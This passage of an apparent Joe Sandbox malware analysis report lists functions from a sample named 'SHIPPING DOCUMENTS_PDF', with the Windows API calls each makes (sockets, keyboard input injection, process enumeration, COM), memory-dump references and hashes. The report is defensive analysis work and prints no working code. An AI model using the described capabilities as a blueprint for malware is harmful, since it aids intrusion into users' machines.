                                                                                    • Opcode Fuzzy Hash: 6385dde5da3b54c674ab7e6650d6ba0fd9053395fa3b4f84ad437e8361d3e588
                                                                                    • Instruction Fuzzy Hash: DEC15871608301DFC715DF28C480A6ABBE4FF89714F1489AEF8A99B351D731E946CB82
                                                                                    Function 00BC8093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CoInitialize.OLE32(00000000), ref: 00BC80C3
                                                                                    • CoUninitialize.OLE32 ref: 00BC80CE
                                                                                      • Part of subcall function 00BAD56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00BAD5D4
                                                                                    • VariantInit.OLEAUT32(?), ref: 00BC80D9
                                                                                    • VariantClear.OLEAUT32(?), ref: 00BC83AA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                    • String ID:
                                                                                    • API String ID: 780911581-0
                                                                                    • Opcode ID: fa31198798fde708eb6be951c6ae6d49a742ac7d248ae9434faabf9c42b8dd6e
                                                                                    • Instruction ID: b3aef4d8c8c5cb34c891ba2f78ff768a7318005d9ef0e2f8e3e04cf15c04ff22
                                                                                    • Opcode Fuzzy Hash: fa31198798fde708eb6be951c6ae6d49a742ac7d248ae9434faabf9c42b8dd6e
                                                                                    • Instruction Fuzzy Hash: 42A12535604B019FDB10DF54C885B2AB7E4BF89354F18449DF99A9B3A1CB30ED05CB96
                                                                                    Function 00BA7530 Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00BE2C7C,?), ref: 00BA76EA
                                                                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00BE2C7C,?), ref: 00BA7702
                                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,00BDFB80,000000FF,?,00000000,00000800,00000000,?,00BE2C7C,?), ref: 00BA7727
                                                                                    • _memcmp.LIBCMT ref: 00BA7748
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: FromProg$FreeTask_memcmp
                                                                                    • String ID:
                                                                                    • API String ID: 314563124-0
                                                                                    • Opcode ID: 8ad0fec30d3cb4e43353742aa5b4e0aaf4e23153324393dbeb99ce4e18d6a1f0
                                                                                    • Instruction ID: 118b39d4911b12451cf4d12a3895e5e3d396e898b8d255729370bd90f0abf7af
                                                                                    • Opcode Fuzzy Hash: 8ad0fec30d3cb4e43353742aa5b4e0aaf4e23153324393dbeb99ce4e18d6a1f0
                                                                                    • Instruction Fuzzy Hash: D7811E75A04109EFCB04DFA8C984EEEB7F9FF89315F204599E505AB250DB71AE05CB60
                                                                                    Function 00BA687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$AllocClearCopyInitString
                                                                                    • String ID:
                                                                                    • API String ID: 2808897238-0
                                                                                    • Opcode ID: 2a1fa596b16ccce597928011ae1365c35d96645ce31591f3acdd478f2c5a5d91
                                                                                    • Instruction ID: 422887f989117446de1478ec2cfbcaf4b503272c12ba7526fc137160fc9febdd
                                                                                    • Opcode Fuzzy Hash: 2a1fa596b16ccce597928011ae1365c35d96645ce31591f3acdd478f2c5a5d91
                                                                                    • Instruction Fuzzy Hash: 9751B7B47083019ADB24AF65D89173AB3E5EF56310F28C89FE596D7291DB74D8408B01
                                                                                    Function 00BD97F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetWindowRect.USER32(00D5DBC0,?), ref: 00BD9863
                                                                                    • ScreenToClient.USER32(00000002,00000002), ref: 00BD9896
                                                                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00BD9903
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ClientMoveRectScreen
                                                                                    • String ID:
                                                                                    • API String ID: 3880355969-0
                                                                                    • Opcode ID: 95b859bba75e903bdad6bcd69e8a00679b12e7a70f8ef912eb9e674c9a394c2b
                                                                                    • Instruction ID: ce2576db004739cd302633c6bd95ee27cdf058ad6ac1f17b6d70ab8013d48aef
                                                                                    • Opcode Fuzzy Hash: 95b859bba75e903bdad6bcd69e8a00679b12e7a70f8ef912eb9e674c9a394c2b
                                                                                    • Instruction Fuzzy Hash: 4B512E34A01205EFDF14CF58C890AAEBBF5FB46760F14819AF8559B3A0E731AD41DB90
                                                                                    Function 00BA9A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00BA9AD2
                                                                                    • __itow.LIBCMT ref: 00BA9B03
                                                                                      • Part of subcall function 00BA9D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00BA9DBE
                                                                                    • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00BA9B6C
                                                                                    • __itow.LIBCMT ref: 00BA9BC3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$__itow
                                                                                    • String ID:
                                                                                    • API String ID: 3379773720-0
                                                                                    • Opcode ID: 33e075ef74df00d772e11ace1c54ca3f25f178585d4d769a8776ad38606ec4a6
                                                                                    • Instruction ID: 41de0057ec24aceab37786a28a768c0fba53756b935982b183fe03873a0931fa
                                                                                    • Opcode Fuzzy Hash: 33e075ef74df00d772e11ace1c54ca3f25f178585d4d769a8776ad38606ec4a6
                                                                                    • Instruction Fuzzy Hash: 2941AE70A04208ABDF25EF54D885BEE7BF9EF49711F0040E9F905A7291DB709A48DBA1
                                                                                    Function 00BC69AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 00BC69D1
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00BC69E1
                                                                                      • Part of subcall function 00B59837: __itow.LIBCMT ref: 00B59862
                                                                                      • Part of subcall function 00B59837: __swprintf.LIBCMT ref: 00B598AC
                                                                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00BC6A45
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00BC6A51
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$__itow__swprintfsocket
                                                                                    • String ID:
                                                                                    • API String ID: 2214342067-0
                                                                                    • Opcode ID: 94b495bce9c7026210bbc0792f6115c179fe15329956435873edde52c2c035e4
                                                                                    • Instruction ID: d19a5703215ab6517f5a8a36843ef04e90dd1aaa28c3f0d5bab5c08f5f98c64c
                                                                                    • Opcode Fuzzy Hash: 94b495bce9c7026210bbc0792f6115c179fe15329956435873edde52c2c035e4
                                                                                    • Instruction Fuzzy Hash: 46417C75640200AFEB60AF24CC86F7A77E4DB14B54F1484ECFE59AF2D2DAB19D048B91
                                                                                    Function 00BC641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00BDF910), ref: 00BC64A7
                                                                                    • _strlen.LIBCMT ref: 00BC64D9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: _strlen
                                                                                    • String ID:
                                                                                    • API String ID: 4218353326-0
                                                                                    • Opcode ID: 572b3e56720792bed45bd604de3c11739261e44a9e995e3e11c5ca70f114cfae
                                                                                    • Instruction ID: ed19d482636c6d7fb125198e836fdbb7177227416636b06cd55d8fb2a0aefd4e
                                                                                    • Opcode Fuzzy Hash: 572b3e56720792bed45bd604de3c11739261e44a9e995e3e11c5ca70f114cfae
                                                                                    • Instruction Fuzzy Hash: F0418571904108ABCB14EBA4DCD5FBEB7E9AF54311F2481E9F91A97292DB30ED04CB51
                                                                                    Function 00BBB7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00BBB89E
                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 00BBB8C4
                                                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00BBB8E9
                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00BBB915
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                    • String ID:
                                                                                    • API String ID: 3321077145-0
                                                                                    • Opcode ID: bec12549fd1a91f05d0e8130838dc64f4a4369cdbcbed99725f2e4f1e9383f56
                                                                                    • Instruction ID: 4d4629bc6db0578237c1f6a490fcc52da41b01307c79b6c992d4d18068d3ad8b
                                                                                    • Opcode Fuzzy Hash: bec12549fd1a91f05d0e8130838dc64f4a4369cdbcbed99725f2e4f1e9383f56
                                                                                    • Instruction Fuzzy Hash: 8241F839600A11DFCB11EF15C495A69BBE1EF8A350F1980D9ED4AAB362CB70FD05CB91
                                                                                    Function 00BD8851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00BD88DE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: InvalidateRect
                                                                                    • String ID:
                                                                                    • API String ID: 634782764-0
                                                                                    • Opcode ID: 46bebe05d0d62edfb1480d6a916f5a1da238e919cbb657ea147ce00ad358ea97
                                                                                    • Instruction ID: 68229a53e27b7bf606957fde51e477739ad15f4f812edd1f6b514f7773ec30df
                                                                                    • Opcode Fuzzy Hash: 46bebe05d0d62edfb1480d6a916f5a1da238e919cbb657ea147ce00ad358ea97
                                                                                    • Instruction Fuzzy Hash: 1031E534604108EFEB249A18DCA5FBCFBE5EB06312F944193F991D63E1EE35D9409752
                                                                                    Function 00BDAB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ClientToScreen.USER32(?,?), ref: 00BDAB60
                                                                                    • GetWindowRect.USER32(?,?), ref: 00BDABD6
                                                                                    • PtInRect.USER32(?,?,00BDC014), ref: 00BDABE6
                                                                                    • MessageBeep.USER32(00000000), ref: 00BDAC57
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                                    • String ID:
                                                                                    • API String ID: 1352109105-0
                                                                                    • Opcode ID: f15e12474e69360b45f19a398f47dfd5c0908aed430e2e98e54a5243a1f5f248
                                                                                    • Instruction ID: 92b4b032e3bafa4b72fd330bccd9e358a208f52caffe11d4d3bbc1a6dd1515d8
                                                                                    • Opcode Fuzzy Hash: f15e12474e69360b45f19a398f47dfd5c0908aed430e2e98e54a5243a1f5f248
                                                                                    • Instruction Fuzzy Hash: BC416E30610119DFDB11DF58D894BA9FBF5FB4A320F1880EAE8159B361E730E941CB92
                                                                                    Function 00BB0AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00BB0B27
                                                                                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 00BB0B43
                                                                                    • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00BB0BA9
                                                                                    • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00BB0BFB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                    • String ID:
                                                                                    • API String ID: 432972143-0
                                                                                    • Opcode ID: 0b6350990623ef6f3f2788a1c4a71c1e65f08c0a87c36f5859e2c7909f538a4b
                                                                                    • Instruction ID: 48109fb24797549817fd45d59ea7f7cf3139a1f1ee535f7170efba4231213ccd
                                                                                    • Opcode Fuzzy Hash: 0b6350990623ef6f3f2788a1c4a71c1e65f08c0a87c36f5859e2c7909f538a4b
                                                                                    • Instruction Fuzzy Hash: 98314630D64208AFFB30AB658C05BFFBBE9EB45318F0842DAE491521E1D7F58940D751
                                                                                    Function 00BB0C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00BB0C66
                                                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00BB0C82
                                                                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 00BB0CE1
                                                                                    • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00BB0D33
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                    • String ID:
                                                                                    • API String ID: 432972143-0
                                                                                    • Opcode ID: 1288ab0ba291cbce82373cea05a582886ac141b6ee44f6697c2fc0087a9f08ec
                                                                                    • Instruction ID: 832100f5e7d7f930f71154d310cc0199997c4eeb5d8abadb01d496cd5de36c72
                                                                                    • Opcode Fuzzy Hash: 1288ab0ba291cbce82373cea05a582886ac141b6ee44f6697c2fc0087a9f08ec
                                                                                    • Instruction Fuzzy Hash: 513146309642086FFF30AA658814BFFBFE6EB45320F0443ABE881521D1D7B599558751
                                                                                    Function 00B861C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00B861FB
                                                                                    • __isleadbyte_l.LIBCMT ref: 00B86229
                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00B86257
                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00B8628D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                    • String ID:
                                                                                    • API String ID: 3058430110-0
                                                                                    • Opcode ID: e9759f2d23affa7b0a741bd051cdb290a9a325a7dc31c1656b480a45e855da7f
                                                                                    • Instruction ID: 2f965c09303f10921f210a15c93e872f26a801f390f14849dea16f97f2f2ecd0
                                                                                    • Opcode Fuzzy Hash: e9759f2d23affa7b0a741bd051cdb290a9a325a7dc31c1656b480a45e855da7f
                                                                                    • Instruction Fuzzy Hash: 9A31CD30604246AFDF22AF64CC48BBA7BE9FF41310F1540E9E824971A1EB31E950DB90
                                                                                    Function 00BD4EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetForegroundWindow.USER32 ref: 00BD4F02
                                                                                      • Part of subcall function 00BB3641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00BB365B
                                                                                      • Part of subcall function 00BB3641: GetCurrentThreadId.KERNEL32 ref: 00BB3662
                                                                                      • Part of subcall function 00BB3641: AttachThreadInput.USER32(00000000,?,00BB5005), ref: 00BB3669
                                                                                    • GetCaretPos.USER32(?), ref: 00BD4F13
                                                                                    • ClientToScreen.USER32(00000000,?), ref: 00BD4F4E
                                                                                    • GetForegroundWindow.USER32 ref: 00BD4F54
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                    • String ID:
                                                                                    • API String ID: 2759813231-0
                                                                                    • Opcode ID: a21059fe620662ef6173b96d31cd446aed25acff390b252ac2b5522ed045dd6b
                                                                                    • Instruction ID: ef64bbb4fdb1a28e3a18758f6777d5c4b9de4b8078e82128a75678d479eb71ed
                                                                                    • Opcode Fuzzy Hash: a21059fe620662ef6173b96d31cd446aed25acff390b252ac2b5522ed045dd6b
                                                                                    • Instruction Fuzzy Hash: A4310171D00108AFDB00EFA5C885AEFB7F9EF58300F1044AAE815E7251EB719E058BA0
                                                                                    Function 00BB3C55 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00BB3C7A
                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00BB3C88
                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00BB3CA8
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00BB3D52
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
